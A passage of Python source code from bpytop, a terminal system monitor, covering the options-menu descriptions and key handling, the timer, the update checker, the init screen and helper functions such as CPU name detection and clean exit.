'"~/.config/bpytop/themes".',
'',
'"Default" for builtin default theme.',
'User themes are prefixed by a plus sign "+".',
'',
'For theme updates see:',
'https://github.com/aristocratos/bpytop'],
"theme_background" : [
'If the theme set background should be shown.',
'',
'Set to False if you want terminal background',
'transparency.'],
"truecolor" : [
'Sets if 24-bit truecolor should be used.',
'(Requires restart to take effect!)',
'',
'Will convert 24-bit colors to 256 color',
'(6x6x6 color cube) if False.',
'',
'Set to False if your terminal doesn\'t have',
'truecolor support and can\'t convert to',
'256-color.'],
"shown_boxes" : [
'Manually set which boxes to show.',
'',
'Available values are "cpu mem net proc".',
'Seperate values with whitespace.',
'',
'Toggle between presets with mode key "m".'],
"update_ms" : [
'Update time in milliseconds.',
'',
'Recommended 2000 ms or above for better sample',
'times for graphs.',
'',
'Min value: 100 ms',
'Max value: 86400000 ms = 24 hours.'],
"draw_clock" : [
'Draw a clock at top of screen.',
'(Only visible if cpu box is enabled!)',
'',
'Formatting according to strftime, empty',
'string to disable.',
'',
'Custom formatting options:',
'"/host" = hostname',
'"/user" = username',
'"/uptime" = system uptime',
'',
'Examples of strftime formats:',
'"%X" = locale HH:MM:SS',
'"%H" = 24h hour, "%I" = 12h hour',
'"%M" = minute, "%S" = second',
'"%d" = day, "%m" = month, "%y" = year'],
"background_update" : [
'Update main ui when menus are showing.',
'',
'True or False.',
'',
'Set this to false if the menus is flickering',
'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'(Only visible if cpu box is enabled!)',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetical and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"cpu_graph_upper" : [
'Sets the CPU stat shown in upper half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_graph_lower" : [
'Sets the CPU stat shown in lower half of',
'the CPU graph.',
'',
'"total" = Total cpu usage.',
'"user" = User mode cpu usage.',
'"system" = Kernel mode cpu usage.',
'See:',
'https://psutil.readthedocs.io/en/latest/',
'#psutil.cpu_times',
'for attributes available on specific platforms.'],
"cpu_invert_lower" : [
'Toggles orientation of the lower CPU graph.',
'',
'True or False.'],
"cpu_single_graph" : [
'Completely disable the lower CPU graph.',
'',
'Shows only upper CPU graph and resizes it',
'to fit to box height.',
'',
'True or False.'],
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"temp_scale" : [
'Which temperature scale to use.',
'',
'Celsius, default scale.',
'',
'Fahrenheit, the american one.',
'',
'Kelvin, 0 = absolute zero, 1 degree change',
'equals 1 degree change in Celsius.',
'',
'Rankine, 0 = absolute zero, 1 degree change',
'equals 1 degree change in Fahrenheit.'],
"show_cpu_freq" : [
'Show CPU frequency',
'',
'Can cause slowdowns on systems with many',
'cores and psutil versions below 5.8.1'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
"show_uptime" : [
'Shows the system uptime in the CPU box.',
'',
'Can also be shown in the clock by using',
'"/uptime" in the formatting.',
'',
'True or False.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_io_stat" : [
'Toggle small IO stat graphs.',
'',
'Toggles the small IO graphs for the regular',
'disk usage view.',
'',
'True or False.'],
"io_mode" : [
'Toggles io mode for disks.',
'',
'Shows big graphs for disk read/write speeds',
'instead of used/free percentage meters.',
'',
'True or False.'],
"io_graph_combined" : [
'Toggle combined read and write graphs.',
'',
'Only has effect if "io mode" is True.',
'',
'True or False.'],
"io_graph_speeds" : [
'Set top speeds for the io graphs.',
'',
'Manually set which speed in MiB/s that equals',
'100 percent in the io graphs.',
'(10 MiB/s by default).',
'',
'Format: "device:speed" separate disks with a',
'comma ",".',
'',
'Example: "/dev/sda:100, /dev/sdb:20".'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS X)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Otherwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MibiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to current themes',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
cpu_graph_i: Dict[str, int] = { "cpu_graph_upper" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_upper),
"cpu_graph_lower" : CONFIG.cpu_percent_fields.index(CONFIG.cpu_graph_lower)}
temp_scale_i: int = CONFIG.temp_scales.index(CONFIG.temp_scale)
color_i: int
max_opt_len: int = max([len(categories[x]) for x in categories]) * 2
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < max_opt_len + 13 else Term.height // 2 - max_opt_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {CONFIG.sorting_options.index(CONFIG.proc_sorting) + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
elif opt in ["cpu_graph_upper", "cpu_graph_lower"]:
counter = f' {cpu_graph_i[opt] + 1}/{len(CONFIG.cpu_percent_fields)}'
elif opt == "temp_scale":
counter = f' {temp_scale_i + 1}/{len(CONFIG.temp_scales)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor", "cpu_graph_upper", "cpu_graph_lower", "temp_scale"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
break
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
elif selected == "io_graph_speeds":
MemBox.graph_speeds = {}
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and page in [0, pages]):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface", "io_graph_speeds"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected in ["cpu_graph_upper", "cpu_graph_lower"]:
if key == "left":
cpu_graph_i[selected] -= 1
if cpu_graph_i[selected] < 0: cpu_graph_i[selected] = len(CONFIG.cpu_percent_fields) - 1
if key == "right":
cpu_graph_i[selected] += 1
if cpu_graph_i[selected] > len(CONFIG.cpu_percent_fields) - 1: cpu_graph_i[selected] = 0
setattr(CONFIG, selected, CONFIG.cpu_percent_fields[cpu_graph_i[selected]])
setattr(CpuCollector, selected.replace("_graph", ""), [])
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "temp_scale":
if key == "left":
temp_scale_i -= 1
if temp_scale_i < 0: temp_scale_i = len(CONFIG.temp_scales) - 1
if key == "right":
temp_scale_i += 1
if temp_scale_i > len(CONFIG.temp_scales) - 1: temp_scale_i = 0
CONFIG.temp_scale = CONFIG.temp_scales[temp_scale_i]
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
t_left: float = cls.timestamp + (CONFIG.update_ms / 1000) - time()
if t_left > CONFIG.update_ms / 1000:
cls.stamp()
return CONFIG.update_ms / 1000
return t_left
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command ="sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command ="sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
core_ids: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
core_id = int(line.strip()[(line.index(": ")+2):])
if core_id not in core_ids:
core_ids.append(core_id)
mapping[num] = core_ids.index(core_id)
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
